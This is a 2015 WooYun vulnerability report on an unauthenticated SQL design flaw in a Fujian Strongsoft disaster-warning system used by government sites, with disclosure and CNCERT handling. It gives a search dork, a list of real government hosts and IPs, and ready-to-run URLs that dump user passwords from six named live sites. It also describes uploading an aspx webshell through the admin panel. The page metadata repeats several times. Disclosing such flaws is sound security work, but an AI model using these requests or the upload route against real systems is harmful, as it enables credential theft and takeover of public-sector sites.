某通用型灾害预警系统越权及设计缺陷致使大量政府网站沦陷

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094844

漏洞标题：某通用型灾害预警系统越权及设计缺陷致使大量政府网站沦陷

漏洞作者： BMa

提交时间：2015-02-23 10:09

修复时间：2015-05-31 11:24

公开时间：2015-05-31 11:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-23：细节已通知厂商并且等待厂商处理中
2015-03-02：厂商已经确认，细节仅向厂商公开
2015-03-05：细节向第三方安全合作伙伴开放
2015-04-26：细节向核心白帽子及相关领域专家公开
2015-05-06：细节向普通白帽子公开
2015-05-16：细节向实习白帽子公开
2015-05-31：细节向公众公开

简要描述：

某通用型灾害预警系统越权及设计缺陷致使大量政府网站沦陷
管理审核时麻烦注意与其他的不同，我在乌云上没有找到类似的漏洞

详细说明：

应用官网：http://www.strongsoft.net/
关键字：intitle:预警系统技术支持:福建四创
部分举例：

shzh.wlfx.gov.cn/
218.86.6.48:3505/
yj.yywater.gov.cn/
222.216.218.28:8088/
219.159.102.99:8088/
218.86.96.98:3505/
111.12.51.221:8088/
222.242.107.62:4000/
fxb.lucheng.gov.cn/
183.233.205.85:9001/
222.83.214.58:8088/
180.130.175.138:3503/
hzh.wlfx.gov.cn 
shzh.dqwater.gov.cn
218.86.6.48:3505
219.159.239.96:8088/

先说说越权：
以http://219.159.239.96:8088/为例，在后台测试中发现如下操作无需登录即可进行：

http://219.159.239.96:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserID,varchar&columns=UserID,UserName,UserPhone,ltrim(rtrim(UserStatus))|','|isnull((select top 1 Enuname from L03_ennuvaldep where enuval =convert(varchar(50),UserStatus)  and enucd='User_Status'),'') as UserStatus,convert(varchar,CreateTime, 120)  as CreateTime,ltrim(rtrim(DeptID))|','|isnull((select top 1 ltrim(rtrim(RoleName)) from Web_SystemUserRole where 1=1  and RoleID=Web_SystemUser.DeptID  ),'') as DeptID,1,ltrim(rtrim(RoleID))|','|isnull((select top 1 ltrim(rtrim(RoleName)) from L04_Role where 1=1  and RoleId=Web_SystemUser.RoleID  ),'') as RoleID,1,ltrim(rtrim(ADCD))|','|isnull((select top 1 ltrim(rtrim(ADNM)) from StrongWater.dbo.AD_Info_B where 1=1  and ADCD=Web_SystemUser.ADCD  ),'') as ADCD,1&_=1422623883495

观察语句，发现这就是一条内置的sql，这是一处设计缺陷，可以用来构造新的查询：

http://219.159.239.96:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

得到用户名密码：

后台getshell在：基础信息查询-行政信息基本情况-预案管理，可以直接上传aspx文件，返回路径
问题URL:

/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

其他例子：
第一个：

http://222.216.218.28:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

第二个：

http://219.159.102.99:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

第三个：

http://111.12.51.221:8088/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

第四个：

http://183.233.205.85:9001/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

第五个：

shzh.dqwater.gov.cn/TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

第六个：

http://yj.yywater.gov.cn//TableDataManage/AjaxHandle/AjaxBaseInfoQuery.ashx?filter=and DeptID!=1&orderby=&tabnm=Web_SystemUser&pk=UserID&pkCollections=UserPwd,varchar&columns=UserID,UserName,UserPhone,UserPwd,null,null,null,null,null,1&_=1422623883495

其他的就不举例了

漏洞证明：

其实这里应该是可以构造注入的
不尝试了！

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-03-02 11:22

厂商回复：

CNVD确认所述漏洞情况，已经转由CNCERT下发给福建分中心，由福建分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094844

漏洞标题：某通用型灾害预警系统越权及设计缺陷致使大量政府网站沦陷

相关厂商：福建四创

漏洞作者： BMa

提交时间：2015-02-23 10:09

修复时间：2015-05-31 11:24

公开时间：2015-05-31 11:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-094844

漏洞标题：某通用型灾害预警系统越权及设计缺陷致使大量政府网站沦陷

相关厂商：福建四创

漏洞作者： BMa

提交时间：2015-02-23 10:09

修复时间：2015-05-31 11:24

公开时间：2015-05-31 11:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-094844"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：